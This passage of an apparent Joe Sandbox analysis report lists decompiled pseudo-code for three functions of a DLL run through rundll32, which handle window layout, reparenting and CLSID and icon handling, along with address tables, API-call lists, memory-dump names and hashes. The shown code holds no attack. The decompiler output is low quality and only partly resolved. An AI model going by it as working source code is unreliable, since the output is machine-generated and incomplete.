					E1000836F(_t131, _t133, 0, _t161, _t170);
				}
				if(_t161 == 0) {
					goto L1;
				}
				_t78 = GetWindowRect( *(_t161 + 0x20), _t164 - 0x80);
				if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 ||  *(_t164 - 0x54) != 0 && EqualRect(_t164 - 0x80,  *(_t164 - 0x54)) == 0) {
					if( *((intOrPtr*)(_t131 + 0x94)) != 0 && ( *(_t161 + 0x84) & 0x00000040) != 0) {
						 *(_t131 + 0x80) =  *(_t131 + 0x80) | 0x00000040;
					}
					 *(_t131 + 0x80) =  *(_t131 + 0x80) & 0xfffffff9;
					_t81 =  *(_t161 + 0x80) & 0x00000006 |  *(_t131 + 0x80);
					_t178 = _t81 & 0x00000040;
					 *(_t131 + 0x80) = _t81;
					if((_t81 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t164 - 0x50);
						E10011872(_t131, _t161, 0, _t161, _t178);
						E100296F9(_t161, _t153,  *((intOrPtr*)(_t131 + 0x20)), _t164 - 0x50);
					}
					_t86 = ( *(_t161 + 0x80) ^  *(_t131 + 0x80)) & 0x0000f000 ^  *(_t161 + 0x80) | 0x00000f00;
					if( *((intOrPtr*)(_t131 + 0x94)) == 0) {
						_t87 = _t86 & 0xfffffffe;
						__eflags = _t86 & 0xfffffffe;
					} else {
						_t87 = _t86 | 0x00000001;
					}
					E1002B818(_t161, _t87);
					 *((intOrPtr*)(_t164 - 0x6c)) = 0;
					if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 && IsWindowVisible( *(_t161 + 0x20)) != 0) {
						E100117F5(_t161, 0, 0, 0, 0, 0, 0x97);
						 *((intOrPtr*)(_t164 - 0x6c)) = 1;
					}
					 *(_t164 - 0x70) =  *(_t164 - 0x70) | 0xffffffff;
					if( *(_t164 - 0x54) == 0) {
						_t60 = _t131 + 0x98; // 0x98
						_t156 = _t60;
						E10038EAD(_t131, _t60, _t164,  *((intOrPtr*)(_t60 + 8)), _t161);
						E10038EAD(_t131, _t156, _t164,  *((intOrPtr*)(_t156 + 8)), 0);
						_t91 =  *0x10099124; // 0x2
						_t157 = 0;
						__eflags = 0;
						_t93 =  *0x10099120; // 0x2
						_t138 = _t161;
						E100117F5(_t161, 0,  ~_t93,  ~_t91, 0, 0, 0x115);
					} else {
						CopyRect(_t164 - 0x68,  *(_t164 - 0x54));
						E10008D13(_t131, _t164 - 0x68);
						asm("cdq");
						asm("cdq");
						_push(( *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)) - _t153 >> 1) +  *((intOrPtr*)(_t164 - 0x64)));
						_push(( *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68) - _t153 >> 1) +  *(_t164 - 0x68));
						_push( *((intOrPtr*)(_t164 - 0x58)));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t117 = E1002CF10(_t131);
						_t138 =  *((intOrPtr*)(_t164 - 0x58));
						 *(_t164 - 0x70) = _t117;
						E100117F5( *((intOrPtr*)(_t164 - 0x58)), 0,  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x64)),  *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)), 0x114);
						_t161 =  *((intOrPtr*)(_t164 - 0x58));
						_t157 = 0;
					}
					if(E1000E5E5(_t131, _t138, _t164, GetParent( *(_t161 + 0x20))) != _t131) {
						E100188D4(_t161, _t131);
					}
					_t139 =  *((intOrPtr*)(_t161 + 0x8c));
					if(_t139 != _t131) {
						__eflags = _t139 - _t157;
						if(_t139 != _t157) {
							__eflags =  *((intOrPtr*)(_t131 + 0x94)) - _t157;
							if( *((intOrPtr*)(_t131 + 0x94)) == _t157) {
								L28:
								_t101 = 0;
								__eflags = 0;
							} else {
								__eflags =  *((intOrPtr*)(_t139 + 0x94)) - _t157;
								if( *((intOrPtr*)(_t139 + 0x94)) != _t157) {
									goto L28;
								} else {
									_t101 = 1;
								}
							}
							_push(_t101);
							_push(0xffffffff);
							goto L30;
						}
					} else {
						_push(_t157);
						_push( *(_t164 - 0x70));
						L30:
						_push(_t161);
						E1002D0EE(_t139, _t157);
					}
					 *((intOrPtr*)(_t161 + 0x8c)) = _t131;
					if( *((intOrPtr*)(_t164 - 0x6c)) != _t157) {
						E100117F5(_t161, _t157, _t157, _t157, _t157, _t157, 0x57);
					}
					E1002D087(_t131, _t131, _t164, _t161);
					 *(E1001357B(_t131) + 0xd0) =  *(_t78 + 0xd0) | 0x0000000c;
				}
				_pop(_t158);
				_pop(_t162);
				_pop(_t132);
				return E10039F21(_t78, _t132,  *(_t164 + 0xb4) ^ _t164, _t153, _t158, _t162);
			}
























                                                                                                        0x1002d225
                                                                                                        0x1002d225
                                                                                                        0x1002d226
                                                                                                        0x1002d233
                                                                                                        0x1002d23a
                                                                                                        0x1002d248
                                                                                                        0x1002d24f
                                                                                                        0x1002d253
                                                                                                        0x1002d255
                                                                                                        0x1002d258
                                                                                                        0x1002d25b
                                                                                                        0x1002d25d
                                                                                                        0x1002d25d
                                                                                                        0x1002d25d
                                                                                                        0x1002d264
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002d26d
                                                                                                        0x1002d279
                                                                                                        0x1002d29f
                                                                                                        0x1002d2aa
                                                                                                        0x1002d2aa
                                                                                                        0x1002d2b1
                                                                                                        0x1002d2c7
                                                                                                        0x1002d2c9
                                                                                                        0x1002d2cb
                                                                                                        0x1002d2d1
                                                                                                        0x1002d2d3
                                                                                                        0x1002d2db
                                                                                                        0x1002d2de
                                                                                                        0x1002d2ea
                                                                                                        0x1002d2ea
                                                                                                        0x1002d306
                                                                                                        0x1002d311
                                                                                                        0x1002d318
                                                                                                        0x1002d318
                                                                                                        0x1002d313
                                                                                                        0x1002d313
                                                                                                        0x1002d313
                                                                                                        0x1002d31e
                                                                                                        0x1002d329
                                                                                                        0x1002d32c
                                                                                                        0x1002d347
                                                                                                        0x1002d34c
                                                                                                        0x1002d34c
                                                                                                        0x1002d353
                                                                                                        0x1002d35a
                                                                                                        0x1002d3d7
                                                                                                        0x1002d3d7
                                                                                                        0x1002d3e3
                                                                                                        0x1002d3ef
                                                                                                        0x1002d3f4
                                                                                                        0x1002d3fe
                                                                                                        0x1002d3fe
                                                                                                        0x1002d405
                                                                                                        0x1002d40e
                                                                                                        0x1002d410
                                                                                                        0x1002d35c
                                                                                                        0x1002d363
                                                                                                        0x1002d36f
                                                                                                        0x1002d37d
                                                                                                        0x1002d38d
                                                                                                        0x1002d395
                                                                                                        0x1002d396
                                                                                                        0x1002d39c
                                                                                                        0x1002d39f
                                                                                                        0x1002d3a0
                                                                                                        0x1002d3a1
                                                                                                        0x1002d3a4
                                                                                                        0x1002d3a5
                                                                                                        0x1002d3aa
                                                                                                        0x1002d3ad
                                                                                                        0x1002d3cb
                                                                                                        0x1002d3d0
                                                                                                        0x1002d3d3
                                                                                                        0x1002d3d3
                                                                                                        0x1002d426
                                                                                                        0x1002d42b
                                                                                                        0x1002d42b
                                                                                                        0x1002d430
                                                                                                        0x1002d438
                                                                                                        0x1002d440
                                                                                                        0x1002d442
                                                                                                        0x1002d444
                                                                                                        0x1002d44a
                                                                                                        0x1002d459
                                                                                                        0x1002d459
                                                                                                        0x1002d459
                                                                                                        0x1002d44c
                                                                                                        0x1002d44c
                                                                                                        0x1002d452
                                                                                                        0x00000000
                                                                                                        0x1002d454
                                                                                                        0x1002d456
                                                                                                        0x1002d456
                                                                                                        0x1002d452
                                                                                                        0x1002d45b
                                                                                                        0x1002d45c
                                                                                                        0x00000000
                                                                                                        0x1002d45c
                                                                                                        0x1002d43a
                                                                                                        0x1002d43a
                                                                                                        0x1002d43b
                                                                                                        0x1002d45e
                                                                                                        0x1002d45e
                                                                                                        0x1002d45f
                                                                                                        0x1002d45f
                                                                                                        0x1002d467
                                                                                                        0x1002d46d
                                                                                                        0x1002d478
                                                                                                        0x1002d478
                                                                                                        0x1002d480
                                                                                                        0x1002d48c
                                                                                                        0x1002d48c
                                                                                                        0x1002d499
                                                                                                        0x1002d49a
                                                                                                        0x1002d49d
                                                                                                        0x1002d4aa

                                                                                                        APIs
                                                                                                        • GetWindowRect.USER32 ref: 1002D26D
                                                                                                        • EqualRect.USER32 ref: 1002D28B
                                                                                                        • IsWindowVisible.USER32 ref: 1002D331
                                                                                                        • CopyRect.USER32 ref: 1002D363
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                          • Part of subcall function 1002CF10: GetWindowRect.USER32 ref: 1002CF74
                                                                                                          • Part of subcall function 100117F5: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,10005346), ref: 1001181B
                                                                                                        • GetParent.USER32(?), ref: 1002D418
                                                                                                          • Part of subcall function 100188D4: SetParent.USER32(?,?), ref: 100188E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: RectWindow$Parent$CopyEqualException@8H_prolog3ThrowVisible
                                                                                                        • String ID:
                                                                                                        • API String ID: 388495236-0
                                                                                                        • Opcode ID: dd1f3794c556e262e56fb27c0e2836bcfdd51c901db5f87f9c266612e01fb3af
                                                                                                        • Instruction ID: d69bbb92e6aa2c7a755fcaabceb8372724060cfe617d283d3f4571978ac7fb6d
                                                                                                        • Opcode Fuzzy Hash: dd1f3794c556e262e56fb27c0e2836bcfdd51c901db5f87f9c266612e01fb3af
                                                                                                        • Instruction Fuzzy Hash: CA71AC71A00609DBDF54EFA8DC85BAEB7B9FF44300F50452AE99AEB195DB30AD05CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002D4AD, Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 37%
                                                                                                        			E1002D4AD(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				signed char _t68;
				signed int _t73;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				signed int _t120;
				void* _t137;
				RECT* _t139;
				void* _t141;
				intOrPtr _t143;
				void* _t144;
				signed int _t146;
				void* _t148;
				void* _t149;

				_t137 = __edx;
				_t114 = __ecx;
				_t146 = _t148 - 0xb0;
				_t149 = _t148 - 0x130;
				_t61 =  *0x10072650; // 0xb5e27fef
				 *(_t146 + 0xac) = _t61 ^ _t146;
				_t143 =  *((intOrPtr*)(_t146 + 0xb8));
				_t139 =  *(_t146 + 0xbc);
				_t112 = __ecx;
				_t152 = __ecx;
				 *((intOrPtr*)(_t146 - 0x6c)) = _t143;
				 *(_t146 - 0x70) = _t139;
				if(__ecx == 0) {
					L1:
					E1000836F(_t112, _t114, _t139, _t143, _t152);
				}
				if(_t143 == 0) {
					goto L1;
				}
				_t65 = GetWindowRect( *(_t143 + 0x20), _t146 - 0x80);
				if( *((intOrPtr*)(_t143 + 0x8c)) != _t112 || _t139 != 0 && EqualRect(_t146 - 0x80, _t139) == 0) {
					if( *((intOrPtr*)(_t112 + 0x94)) != 0 && ( *(_t143 + 0x84) & 0x00000040) != 0) {
						 *(_t112 + 0x80) =  *(_t112 + 0x80) | 0x00000040;
					}
					 *(_t112 + 0x80) =  *(_t112 + 0x80) & 0xfffffff9;
					_t68 =  *(_t143 + 0x80) & 0x00000006 |  *(_t112 + 0x80);
					_t160 = _t68 & 0x00000040;
					 *(_t112 + 0x80) = _t68;
					if((_t68 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t146 - 0x58);
						E10011872(_t112, _t143, _t139, _t143, _t160);
						E100296F9(_t143, _t137,  *((intOrPtr*)(_t112 + 0x20)), _t146 - 0x58);
					}
					_t73 = ( *(_t143 + 0x80) ^  *(_t112 + 0x80)) & 0x0000f000 ^  *(_t143 + 0x80) | 0x00000f00;
					if( *((intOrPtr*)(_t112 + 0x94)) == 0) {
						_t74 = _t73 & 0xfffffffe;
						__eflags = _t73 & 0xfffffffe;
					} else {
						_t74 = _t73 | 0x00000001;
					}
					E1002B818(_t143, _t74);
					_push(0xffffffff);
					_t140 = E1002CEB4(_t112, GetDlgCtrlID( *(_t143 + 0x20)) & 0x0000ffff);
					if(_t140 > 0) {
						_push(_t140);
						 *((intOrPtr*)(L1002CE98(_t112, _t112 + 0x98, _t140, _t143, _t146))) = _t143;
					}
					if( *(_t146 - 0x70) == 0) {
						__eflags = _t140 - 1;
						if(_t140 < 1) {
							_t140 = _t112 + 0x98;
							E10038EAD(_t112, _t112 + 0x98, _t146,  *((intOrPtr*)(_t112 + 0xa0)), _t143);
							E10038EAD(_t112, _t140, _t146,  *((intOrPtr*)(_t140 + 8)), 0);
						}
						_t118 =  *0x10099124; // 0x2
						_push(0x115);
						__eflags = 0;
						_push(0);
						_push(0);
						_push( ~_t118);
						_t120 =  *0x10099120; // 0x2
						_push( ~_t120);
						_push(0);
					} else {
						CopyRect(_t146 - 0x68,  *(_t146 - 0x70));
						E10008D13(_t112, _t146 - 0x68);
						if(_t140 < 1) {
							asm("cdq");
							asm("cdq");
							_push(( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)) - _t137 >> 1) +  *((intOrPtr*)(_t146 - 0x64)));
							_push(( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68) - _t137 >> 1) +  *(_t146 - 0x68));
							_t140 = _t149 - 0x10;
							_push( *((intOrPtr*)(_t146 - 0x6c)));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E1002CF10(_t112);
							_t143 =  *((intOrPtr*)(_t146 - 0x6c));
						}
						_push(0x114);
						_push( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)));
						_push( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68));
						_push( *((intOrPtr*)(_t146 - 0x64)));
						_push( *(_t146 - 0x68));
						_push(0);
					}
					E100117F5(_t143);
					if(E1000E5E5(_t112, _t143, _t146, GetParent( *(_t143 + 0x20))) != _t112) {
						E100188D4(_t143, _t112);
					}
					_t123 =  *((intOrPtr*)(_t143 + 0x8c));
					if( *((intOrPtr*)(_t143 + 0x8c)) != 0) {
						E1002D0EE(_t123, _t140, _t143, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t143 + 0x8c)) = _t112;
					 *(E1001357B(_t112) + 0xd0) =  *(_t65 + 0xd0) | 0x0000000c;
				}
				_pop(_t141);
				_pop(_t144);
				_pop(_t113);
				return E10039F21(_t65, _t113,  *(_t146 + 0xac) ^ _t146, _t137, _t141, _t144);
			}






















                                                                                                        0x1002d4ad
                                                                                                        0x1002d4ad
                                                                                                        0x1002d4ae
                                                                                                        0x1002d4b5
                                                                                                        0x1002d4bb
                                                                                                        0x1002d4c2
                                                                                                        0x1002d4ca
                                                                                                        0x1002d4d1
                                                                                                        0x1002d4d7
                                                                                                        0x1002d4d9
                                                                                                        0x1002d4db
                                                                                                        0x1002d4de
                                                                                                        0x1002d4e1
                                                                                                        0x1002d4e3
                                                                                                        0x1002d4e3
                                                                                                        0x1002d4e3
                                                                                                        0x1002d4ea
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002d4f3
                                                                                                        0x1002d4ff
                                                                                                        0x1002d523
                                                                                                        0x1002d52e
                                                                                                        0x1002d52e
                                                                                                        0x1002d535
                                                                                                        0x1002d54b
                                                                                                        0x1002d54d
                                                                                                        0x1002d54f
                                                                                                        0x1002d555
                                                                                                        0x1002d557
                                                                                                        0x1002d55f
                                                                                                        0x1002d562
                                                                                                        0x1002d56e
                                                                                                        0x1002d56e
                                                                                                        0x1002d58a
                                                                                                        0x1002d596
                                                                                                        0x1002d59d
                                                                                                        0x1002d59d
                                                                                                        0x1002d598
                                                                                                        0x1002d598
                                                                                                        0x1002d598
                                                                                                        0x1002d5a3
                                                                                                        0x1002d5a8
                                                                                                        0x1002d5be
                                                                                                        0x1002d5c2
                                                                                                        0x1002d5c4
                                                                                                        0x1002d5d0
                                                                                                        0x1002d5d0
                                                                                                        0x1002d5d6
                                                                                                        0x1002d64b
                                                                                                        0x1002d64e
                                                                                                        0x1002d650
                                                                                                        0x1002d65c
                                                                                                        0x1002d668
                                                                                                        0x1002d668
                                                                                                        0x1002d66d
                                                                                                        0x1002d673
                                                                                                        0x1002d678
                                                                                                        0x1002d67a
                                                                                                        0x1002d67b
                                                                                                        0x1002d67e
                                                                                                        0x1002d67f
                                                                                                        0x1002d687
                                                                                                        0x1002d688
                                                                                                        0x1002d5d8
                                                                                                        0x1002d5df
                                                                                                        0x1002d5eb
                                                                                                        0x1002d5f3
                                                                                                        0x1002d5fe
                                                                                                        0x1002d60e
                                                                                                        0x1002d616
                                                                                                        0x1002d617
                                                                                                        0x1002d61b
                                                                                                        0x1002d61d
                                                                                                        0x1002d620
                                                                                                        0x1002d621
                                                                                                        0x1002d622
                                                                                                        0x1002d625
                                                                                                        0x1002d626
                                                                                                        0x1002d62b
                                                                                                        0x1002d62b
                                                                                                        0x1002d634
                                                                                                        0x1002d639
                                                                                                        0x1002d640
                                                                                                        0x1002d641
                                                                                                        0x1002d644
                                                                                                        0x1002d647
                                                                                                        0x1002d647
                                                                                                        0x1002d68b
                                                                                                        0x1002d6a1
                                                                                                        0x1002d6a6
                                                                                                        0x1002d6a6
                                                                                                        0x1002d6ab
                                                                                                        0x1002d6b3
                                                                                                        0x1002d6ba
                                                                                                        0x1002d6ba
                                                                                                        0x1002d6c1
                                                                                                        0x1002d6cc
                                                                                                        0x1002d6cc
                                                                                                        0x1002d6d9
                                                                                                        0x1002d6da
                                                                                                        0x1002d6dd
                                                                                                        0x1002d6ea

                                                                                                        APIs
                                                                                                        • GetWindowRect.USER32 ref: 1002D4F3
                                                                                                        • EqualRect.USER32 ref: 1002D50E
                                                                                                        • GetDlgCtrlID.USER32 ref: 1002D5AD
                                                                                                        • CopyRect.USER32 ref: 1002D5DF
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                          • Part of subcall function 1002CF10: GetWindowRect.USER32 ref: 1002CF74
                                                                                                          • Part of subcall function 100117F5: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,10005346), ref: 1001181B
                                                                                                        • GetParent.USER32(?), ref: 1002D693
                                                                                                          • Part of subcall function 100188D4: SetParent.USER32(?,?), ref: 100188E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Window$Parent$CopyCtrlEqualException@8H_prolog3Throw
                                                                                                        • String ID:
                                                                                                        • API String ID: 964284190-0
                                                                                                        • Opcode ID: 803b6f542d332ac7122ba8d999a801ca133dc651b02ba187918c95e2faca2807
                                                                                                        • Instruction ID: 5889b162fc43a884b75e0f32f304c31daaa837fe3957f50369de8d6d166ca973
                                                                                                        • Opcode Fuzzy Hash: 803b6f542d332ac7122ba8d999a801ca133dc651b02ba187918c95e2faca2807
                                                                                                        • Instruction Fuzzy Hash: D461AD71A006159FDB14EFA8DC85BAE77BAFF48300F40452AE95AEB195DB30AD05CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1003559E, Relevance: 7.7, APIs: 5, Instructions: 183windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E1003559E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HICON__* _t78;
				void* _t80;
				struct HICON__* _t87;
				void* _t94;
				void* _t99;
				struct HICON__* _t108;
				char* _t112;
				void* _t127;
				void* _t147;
				int _t148;
				void* _t152;

				_t145 = __edx;
				E1003EE82(0x100562c7, __ebx, __edi, __esi);
				__imp__StringFromCLSID( *(_t152 + 0xc), _t152 - 0x14, 8);
				_t147 = E1002AC64( *((intOrPtr*)(_t152 - 0x14)));
				if(_t147 != 0) {
					_t151 =  *((intOrPtr*)(_t152 + 8));
					E100351EC(0,  *((intOrPtr*)(_t152 + 8)), __edx, _t152, __eflags, 0, _t147);
					E100351EC(0,  *((intOrPtr*)(_t152 + 8)), __edx, _t152, __eflags, 1,  *((intOrPtr*)(_t152 + 0x10)));
					__imp__CoTaskMemFree(_t147);
					E10001DB0(_t152 - 0x10, E10007F7E());
					 *((intOrPtr*)(_t152 - 4)) = 0;
					E1002F572(0,  *((intOrPtr*)(E1000AB19(0, _t147, _t151, __eflags) + 8)), _t152 - 0x10);
					E100351EC(0, _t151, _t145, _t152, __eflags, 2,  *(_t152 - 0x10));
					E100351EC(0, _t151, _t145, _t152, __eflags, 3,  *((intOrPtr*)(_t152 + 0x14)));
					E100351EC(0, _t151, _t145, _t152, __eflags, 4,  *((intOrPtr*)(_t152 + 0x18)));
					E100351EC(0, _t151, _t145, _t152, __eflags, 5,  *((intOrPtr*)(E1000AB19(0, _t147, _t151, __eflags) + 0x10)));
					E10001DB0(_t152 + 8, E10007F7E());
					_t148 =  *(_t152 + 0x1c);
					__eflags = _t148;
					 *((char*)(_t152 - 4)) = 1;
					if(__eflags != 0) {
						 *(_t152 + 0xc) =  *(_t152 - 0x10);
						_t108 = ExtractIconA( *(E1000AB19(0, _t148, _t151, __eflags) + 8),  *(_t152 + 0xc), _t148);
						__eflags = _t108;
						if(__eflags == 0) {
							_t148 = 0;
							__eflags = 0;
						} else {
							DestroyIcon(_t108);
						}
					}
					E10006190(_t152 + 8, 0x10062f20, _t148);
					_t149 =  *((intOrPtr*)(_t152 + 8));
					E100351EC(0, _t151, _t145, _t152, __eflags, 6,  *((intOrPtr*)(_t152 + 8)));
					E100351EC(0, _t151, _t145, _t152, __eflags, 7,  *((intOrPtr*)(_t152 + 0x20)));
					E10001DB0(_t152 + 0xc, E10007F7E());
					_t78 =  *(_t152 + 0x24);
					__eflags = _t78;
					 *((char*)(_t152 - 4)) = 2;
					if(_t78 == 0) {
						L9:
						E100025A0(_t149,  *((intOrPtr*)(_t152 + 0x20)));
						_t80 = E10035316(_t152 + 0xc, 0x28, 0);
						__eflags = _t80 - 0xffffffff;
						_t127 = _t152 + 0xc;
						if(_t80 == 0xffffffff) {
							L12:
							E10002500(_t127);
							goto L14;
						}
						_push(E10006AA0(_t152 + 0x20, _t80 + 1));
						 *((char*)(_t152 - 4)) = 3;
						E10006E40(_t152 + 0xc);
						 *((char*)(_t152 - 4)) = 2;
						E10001280( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
						_t94 = E10035316(_t152 + 0xc, 0x2e, 0);
						__eflags = _t94 - 0xffffffff;
						_t127 = _t152 + 0xc;
						if(_t94 == 0xffffffff) {
							goto L12;
						}
						_push(E10006AA0(_t152 + 0x20, _t94));
						 *((char*)(_t152 - 4)) = 4;
						E10006E40(_t152 + 0xc);
						 *((char*)(_t152 - 4)) = 2;
						E10001280( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
						_t99 = E10035316(_t152 + 0xc, 0x29, 0);
						__eflags = _t99 - 0xffffffff;
						_t127 = _t152 + 0xc;
						if(_t99 != 0xffffffff) {
							_push(E10006AD0(_t152 + 0x20, _t99));
							 *((char*)(_t152 - 4)) = 5;
							E10006E40(_t152 + 0xc);
							__eflags =  *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0;
							E10001280( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
							goto L14;
						}
						goto L12;
					} else {
						__eflags = _t78->i;
						if(_t78->i == 0) {
							goto L9;
						}
						E100025A0(_t149, _t78);
						L14:
						_t112 =  *(_t152 + 0xc);
						E100351EC(_t112, _t151, _t145, _t152, __eflags, 8, _t112);
						_t51 = _t112 - 0x10; // -16
						E10001280(_t51, _t145);
						E10001280(_t149 - 0x10, _t145);
						E10001280( &(( *(_t152 - 0x10))[0xfffffffffffffff0]), _t145);
						_t87 = 1;
						__eflags = 1;
						L15:
						return E1003EF21(_t87);
					}
				}
				_t87 = 0;
				goto L15;
			}














                                                                                                        0x1003559e
                                                                                                        0x100355a5
                                                                                                        0x100355b1
                                                                                                        0x100355bf
                                                                                                        0x100355c5
                                                                                                        0x100355ce
                                                                                                        0x100355d5
                                                                                                        0x100355e1
                                                                                                        0x100355e7
                                                                                                        0x100355f6
                                                                                                        0x100355fb
                                                                                                        0x1003560b
                                                                                                        0x10035617
                                                                                                        0x10035623
                                                                                                        0x1003562f
                                                                                                        0x10035640
                                                                                                        0x1003564e
                                                                                                        0x10035653
                                                                                                        0x10035656
                                                                                                        0x10035658
                                                                                                        0x1003565c
                                                                                                        0x10035661
                                                                                                        0x10035671
                                                                                                        0x10035677
                                                                                                        0x10035679
                                                                                                        0x10035684
                                                                                                        0x10035684
                                                                                                        0x1003567b
                                                                                                        0x1003567c
                                                                                                        0x1003567c
                                                                                                        0x10035679
                                                                                                        0x10035690
                                                                                                        0x10035695
                                                                                                        0x100356a0
                                                                                                        0x100356ac
                                                                                                        0x100356ba
                                                                                                        0x100356bf
                                                                                                        0x100356c2
                                                                                                        0x100356c4
                                                                                                        0x100356c8
                                                                                                        0x100356dc
                                                                                                        0x100356e2
                                                                                                        0x100356ed
                                                                                                        0x100356f2
                                                                                                        0x100356f5
                                                                                                        0x100356f8
                                                                                                        0x1003576d
                                                                                                        0x1003576d
                                                                                                        0x00000000
                                                                                                        0x1003576d
                                                                                                        0x10035705
                                                                                                        0x10035709
                                                                                                        0x1003570d
                                                                                                        0x10035718
                                                                                                        0x1003571c
                                                                                                        0x10035727
                                                                                                        0x1003572c
                                                                                                        0x1003572f
                                                                                                        0x10035732
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1003573e
                                                                                                        0x10035742
                                                                                                        0x10035746
                                                                                                        0x10035751
                                                                                                        0x10035755
                                                                                                        0x10035760
                                                                                                        0x10035765
                                                                                                        0x10035768
                                                                                                        0x1003576b
                                                                                                        0x1003577e
                                                                                                        0x10035782
                                                                                                        0x10035786
                                                                                                        0x1003578e
                                                                                                        0x10035791
                                                                                                        0x00000000
                                                                                                        0x10035791
                                                                                                        0x00000000
                                                                                                        0x100356ca
                                                                                                        0x100356ca
                                                                                                        0x100356cc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100356d2
                                                                                                        0x10035796
                                                                                                        0x10035796
                                                                                                        0x1003579e
                                                                                                        0x100357a3
                                                                                                        0x100357a6
                                                                                                        0x100357ae
                                                                                                        0x100357b9
                                                                                                        0x100357c0
                                                                                                        0x100357c0
                                                                                                        0x100357c1
                                                                                                        0x100357c6
                                                                                                        0x100357c6
                                                                                                        0x100356c8
                                                                                                        0x100355c7
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 100355A5
                                                                                                        • StringFromCLSID.OLE32(00000000,?,00000008,100358E2,?,?,00000000,?,?,00000000,00000000,00000000,0000000A,00000008,10028965), ref: 100355B1
                                                                                                          • Part of subcall function 1002AC64: CoTaskMemFree.OLE32(?,00000000,100355BF,?,?,?,?,?,?,00000000,00000000), ref: 1002AC75
                                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 100355E7
                                                                                                        • ExtractIconA.SHELL32(?,00000000,?), ref: 10035671
                                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,00000000,00000000), ref: 1003567C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
